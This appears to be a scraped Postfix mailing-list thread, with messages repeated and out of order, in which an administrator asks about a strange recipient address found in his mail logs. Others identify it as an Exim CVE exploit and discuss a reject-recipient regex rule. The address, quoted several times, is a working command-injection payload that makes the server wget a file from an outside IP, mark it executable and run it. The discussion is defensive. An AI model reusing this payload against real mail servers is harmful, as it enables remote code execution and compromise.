Joe Acquisto-j4:
> >>>
> > kris_h:
> >> Hey Wietse,
> >>
> >> thank you for this clearification.
> >>
> >> What do you think about using the reject-recipient /\$\{/-rule?
> >
> > As a temporary rule, it may have made sense when the Exim bug was new.
> >
> > As a permanent 'deny' rule, it won't
>>>
> kris_h:
>> Hey Wietse,
>>
>> thank you for this clearification.
>>
>> What do you think about using the reject-recipient /\$\{/-rule?
>
> As a temporary rule, it may have made sense when the Exim bug was new.
>
> As a permanent 'deny' rule, it won't block new exploits.
>
> Wietse
> As a temporary rule, it may have made sense when the Exim bug was new.
> As a permanent 'deny' rule, it won't block new exploits.
yes, you're right, each PCRE-rule more is one more to be passed for each
recipient...
Thanks
Kris
--
Sent from: http://postfix.1071664.n5.nabble.com/Postfi
kris_h:
> Hey Wietse,
>
> thank you for this clearification.
>
> What do you think about using the reject-recipient /\$\{/-rule?
As a temporary rule, it may have made sense when the Exim bug was new.
As a permanent 'deny' rule, it won't block new exploits.
Wietse
Hey Wietse,
thank you for this clearification.
What do you think about using the reject-recipient /\$\{/-rule?
Kris
--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
Kevin A. McGrail:
>
> On 3/12/2020 4:40 PM, kris_h wrote:
> > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
>
> It's an exim exploit. See CVE-2019-15846.
The above is very similar to the Exim exploit for CVE-2019-10149 in
https://www
> It's an exim exploit. See CVE-2019-15846.
@KAM
Thanks a lot for this really quick reply!
--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
On 3/12/2020 4:40 PM, kris_h wrote:
> root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
It's an exim exploit. See CVE-2019-15846.
Regards,
KAM
Hey
i found this crazy recipient-address in my postfix-logs:
root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
seems that someone tries to to downlaod something with wget, then chmod 'x'
and finally execute the downloded crap
Is there a